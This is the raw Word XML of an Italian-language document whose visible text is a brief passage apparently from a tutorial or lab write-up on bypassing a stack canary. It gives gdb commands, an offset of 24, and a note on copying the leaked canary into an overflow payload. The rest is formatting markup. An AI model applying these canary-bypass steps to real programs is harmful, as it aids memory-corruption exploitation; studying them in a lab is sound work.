            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="601705484" name="Immagine 1" descr="Immagine che contiene schermata, testo,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5484" name="Immagine 1" descr="Immagine che contiene schermata, testo, Carattere, Blu elettrico&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId16"/>
                    <a:srcRect l="3705" t="13208" r="9630"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6150516" cy="1282002"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FBFF1F" w14:textId="40C03051" w:rsidR="00F632DB" w:rsidRDefault="00F632DB" w:rsidP="00562D9A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A noi interessa l’offset che abbiamo appena scoperto essere 24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52923AB4" w14:textId="35406FCB" w:rsidR="00F632DB" w:rsidRPr="00A615C5" w:rsidRDefault="00F632DB" w:rsidP="00562D9A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A615C5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ delete breakpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164ABF32" w14:textId="59BBEBDD" w:rsidR="00F632DB" w:rsidRPr="00A615C5" w:rsidRDefault="00F632DB" w:rsidP="00562D9A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A615C5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ disassemble vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D5AA54" w14:textId="6F29F4AF" w:rsidR="00F632DB" w:rsidRDefault="00F632DB" w:rsidP="00562D9A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F632DB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ break *indirizzo_je_post_c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ompare__canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F2D237" w14:textId="51D1E8B9" w:rsidR="00F632DB" w:rsidRPr="00A615C5" w:rsidRDefault="00F632DB" w:rsidP="00562D9A">
      <w:r w:rsidRPr="00A615C5">
        <w:t>$ run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ACA97C" w14:textId="3E05A20E" w:rsidR="00F632DB" w:rsidRDefault="00F632DB" w:rsidP="00562D9A">
      <w:r w:rsidRPr="00F632DB">
        <w:t>Adesso facciamo overflow senza c</w:t>
      </w:r>
      <w:r>
        <w:t>anary e vediamo cosa succese con il debug.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E31ED0E" w14:textId="619800C0" w:rsidR="00F632DB" w:rsidRDefault="00F632DB" w:rsidP="00562D9A">
      <w:r w:rsidRPr="00F632DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F61AC54" wp14:editId="0131D21C">
            <wp:extent cx="6120130" cy="485140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="440954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54264" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="485140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B6A1BE" w14:textId="025458BD" w:rsidR="00F632DB" w:rsidRDefault="00F632DB" w:rsidP="00562D9A">
      <w:r>
        <w:t>Qua viene sottratto dal valore trovato dal programma quello del canary e se la sottrazione da 0 allora je (jump equals).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFED4BF" w14:textId="77777777" w:rsidR="00A615C5" w:rsidRDefault="00A615C5" w:rsidP="00562D9A"/>
    <w:p w14:paraId="6669558D" w14:textId="13D97738" w:rsidR="00A615C5" w:rsidRDefault="00A615C5" w:rsidP="00562D9A">
      <w:r>
        <w:t>Basterà runnare il programma, copiare da gdb quello che troviamo a stacl 0 + offset e inserirlo nel payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522529D8" w14:textId="77777777" w:rsidR="00F632DB" w:rsidRPr="00F632DB" w:rsidRDefault="00F632DB" w:rsidP="00562D9A"/>
    <w:p w14:paraId="33C3B33A" w14:textId="77777777" w:rsidR="00F632DB" w:rsidRPr="00F632DB" w:rsidRDefault="00F632DB" w:rsidP="00562D9A"/>
    <w:p w14:paraId="40B78F82" w14:textId="77777777" w:rsidR="0013215B" w:rsidRPr="00F632DB" w:rsidRDefault="0013215B" w:rsidP="00562D9A"/>
    <w:p w14:paraId="318AB6A5" w14:textId="77777777" w:rsidR="00A33364" w:rsidRPr="00F632DB" w:rsidRDefault="00A33364" w:rsidP="00562D9A"/>
    <w:p w14:paraId="72B19510" w14:textId="55E1B8D6" w:rsidR="00A33364" w:rsidRPr="00F632DB" w:rsidRDefault="00A33364" w:rsidP="00562D9A"/>
    <w:p w14:paraId="1C34E939" w14:textId="65D3D200" w:rsidR="00562D9A" w:rsidRPr="00F632DB" w:rsidRDefault="00562D9A" w:rsidP="00562D9A"/>
    <w:sectPr w:rsidR="00562D9A" w:rsidRPr="00F632D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w:panose1 w:val="020B0609020000020004"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="A1002AFF" w:usb1="C200F9FB" w:usb2="0004002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3600A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="501E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4728C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5578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E469EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="220A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19877">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="656572159">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="93213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0D"/>
    <w:rsid w:val="0001158F"/>
    <w:rsid w:val="000535FE"/>
    <w:rsid w:val="00060B34"/>
    <w:rsid w:val="0013215B"/>
    <w:rsid w:val="001730F3"/>
    <w:rsid w:val="001849B8"/>
    <w:rsid w:val="001D00EC"/>
    <w:rsid w:val="002902E3"/>
    <w:rsid w:val="0033133F"/>
    <w:rsid w:val="003C22D0"/>
    <w:rsid w:val="004037C0"/>
    <w:rsid w:val="004214B5"/>
    <w:rsid w:val="004552A3"/>
    <w:rsid w:val="004D02F0"/>
    <w:rsid w:val="004F7F3F"/>
    <w:rsid w:val="00562D9A"/>
    <w:rsid w:val="005D4A9F"/>
    <w:rsid w:val="00604771"/>
    <w:rsid w:val="0070510D"/>
    <w:rsid w:val="00755438"/>
    <w:rsid w:val="00837E63"/>
    <w:rsid w:val="008B240B"/>
    <w:rsid w:val="008D38E2"/>
    <w:rsid w:val="009178A9"/>
    <w:rsid w:val="009D6CE9"/>
    <w:rsid w:val="00A32D0D"/>
    <w:rsid w:val="00A33364"/>
    <w:rsid w:val="00A615C5"/>
    <w:rsid w:val="00A82DB7"/>
    <w:rsid w:val="00AA0ADB"/>
    <w:rsid w:val="00AB3559"/>
    <w:rsid w:val="00AC25C2"/>
    <w:rsid w:val="00AE5D32"/>
    <w:rsid w:val="00AF5671"/>
    <w:rsid w:val="00B15362"/>
    <w:rsid w:val="00BD3AE2"/>
    <w:rsid w:val="00C14F71"/>
    <w:rsid w:val="00C21978"/>
    <w:rsid w:val="00C55714"/>
    <w:rsid w:val="00C65D3F"/>
    <w:rsid w:val="00CA3F0C"/>
    <w:rsid w:val="00CC100E"/>
    <w:rsid w:val="00D53D7D"/>
    <w:rsid w:val="00D544D6"/>
    <w:rsid w:val="00D9656F"/>
    <w:rsid w:val="00DE3CC3"/>
    <w:rsid w:val="00F632DB"/>
    <w:rsid w:val="00FC0556"/>
    <w:rsid w:val="00FE5F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FBC3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DCA3ABF2-8D79-4B00-9419-113DDAEE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scadia Code" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
        <w:bCs/>
        <w:kern w:val="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D38E2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo1Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="480" w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo2Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:color w:val="156082" w:themeColor="accent1"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo3Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo4Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo5Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="0A2F40" w:themeColor="accent1" w:themeShade="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo6Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>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Titolo7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo7Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008D38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D38E2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo9Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>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8E2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo2Carattere">
    <w:name w:val="Titolo 2 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:color w:val="156082" w:themeColor="accent1"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo3Carattere">
    <w:name w:val="Titolo 3 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo4Carattere">
    <w:name w:val="Titolo 4 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo5Carattere">
    <w:name w:val="Titolo 5 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="0A2F40" w:themeColor="accent1" w:themeShade="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo6Carattere">
    <w:name w:val="Titolo 6 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0A2F40" w:themeColor="accent1" w:themeShade="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo7Carattere">
    <w:name w:val="Titolo 7 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="008D38E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D38E2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="156082" w:themeColor="accent1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo9Carattere">
    <w:name w:val="Titolo 9 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="008D38E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8D38E2"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:color w:val="156082" w:themeColor="accent1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="TitoloCarattere"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>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oloCarattere">
    <w:name w:val="Titolo Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="0A1D30" w:themeColor="text2" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sottotitolo">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="SottotitoloCarattere"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>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ottotitoloCarattere">
    <w:name w:val="Sottotitolo Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Sottotitolo"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="156082" w:themeColor="accent1"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasigrassetto">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:b/>
      <w:bCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasicorsivo">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nessunaspaziatura">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragrafoelenco">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citazione">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="CitazioneCarattere"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CitazioneCarattere">
    <w:name w:val="Citazione Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Citazione"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citazioneintensa">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="CitazioneintensaCarattere"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="4" w:color="156082" w:themeColor="accent1"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="280"/>
      <w:ind w:left="936" w:right="936"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CitazioneintensaCarattere">
    <w:name w:val="Citazione intensa Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Citazioneintensa"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasidelicata">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="808080" w:themeColor="text1" w:themeTint="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasiintensa">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Riferimentodelicato">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="E97132" w:themeColor="accent2"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Riferimentointenso">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:smallCaps/>
      <w:color w:val="E97132" w:themeColor="accent2"/>
      <w:spacing w:val="5"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Titolodellibro">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolosommario">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Titolo1"/>
    <w:next w:val="Normale"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Collegamentoipertestuale">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004214B5"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Menzionenonrisolta">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0042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141946">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1252008409">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1314796631">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
